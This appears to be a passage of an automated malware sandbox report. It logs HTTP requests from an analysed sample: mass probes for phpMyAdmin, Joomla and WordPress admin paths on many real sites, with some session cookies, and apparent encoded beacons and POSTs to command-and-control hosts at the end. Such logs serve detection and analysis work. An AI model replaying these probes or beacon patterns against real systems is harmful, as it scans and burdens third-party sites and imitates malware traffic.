                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nossoplayer.meAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: midetuvelocidad.claro.com.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: tiktok.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: student.emis.gov.egAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: loopex.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: chainmine.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: phonandroid.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: followerstiktok.xyzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: servicossociais.caixa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ag.ufa9999.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: signin.rockstargames.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mobilsam.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: app.plex.tvAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pan.baidu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cloud.simplify3d.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eei.uniandes.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: yellosa.co.zaAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=cgp1DhR6xTi6CSaGmMluksYz60_fzOwniweAMszarPk-1707131690-1-AchVILVUeldhU0fUL/Sm+vJu4OVXbuNx6MuETCEChl7PvBHFckvoaEMvusYEOEObJusMfqXBe2SlFcG1v+KInlY=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sigapbanjarmasin.infoAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hartico.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cjdropshipping.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: instructory.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mojadovera.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mitextoescolar.mineduc.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aeaaamorim.inovarmais.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oferta.senasofiaplus.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: virtuadopt.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: upsconline.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/?locale=es_LA&_rdr HTTP/1.1Host: m.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: login2.innova.puglia.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /en HTTP/1.1Host: genshin.mihoyo.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: app.plex.tvAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: srienlinea.sri.gob.ecAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: account.mojang.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sistemas.pa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: academico.um.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ssc.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pl-pl.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipCookie: FLYSESSID=r2c0p26i5n0hv6h164082hcuoeUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/?locale=hi_IN&_rdr HTTP/1.1Host: m.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: lookaside.fbsbx.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: yellosa.co.zaAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://accounts.google.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=9aWbkbPT4DdlgG_jg44HMc41AE1.59S3JcFtxwJ.xgU-1707131766-1-AerVx9RXy0Zm7OnurxzYuId07SlHkitQXtOcQmpWK47Y6f+CHIBXVtzdIORdzJ1w/NBTDnTUsLHOaZpdNAQ/zfs=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: app.plex.tvAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.0Host: signin.rockstargames.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: tiktok.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EDDAF7B9110B0A46B575850AB86F0E3E0AEC9356593FDDBE1D721FD3E4C0BAB24User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipCookie: osCsid=a1aabfac7a1f7e8705602ed881881037User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: us04web.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=1iAg.jaqOry6c7AW1l9FRRQzGRAhyUaJmOXCMdnuwVs-1707131767-1-AXN1T055F/0qPV5xho0c5Hp5aAPUnzpxyaVcvCdaYwqNFgvDA63Qh9s5qsoOO8s0XQO1pfqrAc0csWoMqMsU+Ok=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://us04web.zoom.us/wp-login.php
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.0Host: upsconline.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: bonga20120608=d4b62ea767f8c27a8f51fe1000153277; ts_type2=1; __cf_bm=sPKSaJvRUxAcg1PEcdR35O5GebQF9IpP_4Igj06Qn1U-1707131767-1-AfutacbLjRJXJ/HlVv4ccDZ2KwcLDrWfFrasoUlTJQoQXwrk+mYT9PLaGfsipxqCCZnwBC6f5dRn/AaHcx7pL3Q=; uh=IHSAIQqQLaWbpmumq0cKLxuvMUS0Hj==; fv=AmL3ZGZkAmN3ZD==User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipCookie: __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://mega.nz/wp-login.php
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: sport.autoplay.cloudAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=YOyxb9aU78NaI96z2sr4QbRuq80T5iBgvIchIzUA8sc-1707131767-1-AeL6bfGfUZ6U/Ap1Ak+vwqFlIGc33k6j5+9DW+6potT7/e/iNxD6laTBd7Qn7PszDDObqSeT9QEqBj5vyiFCIYY=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef810c3ee939b3c HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yasjbpuumvei.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jblcvnhdfmo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fisqpaapeirybum.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://apflwtmswtngbhc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://odpbiknexhwa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjnsqchgwnudstfw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: selebration17io.io
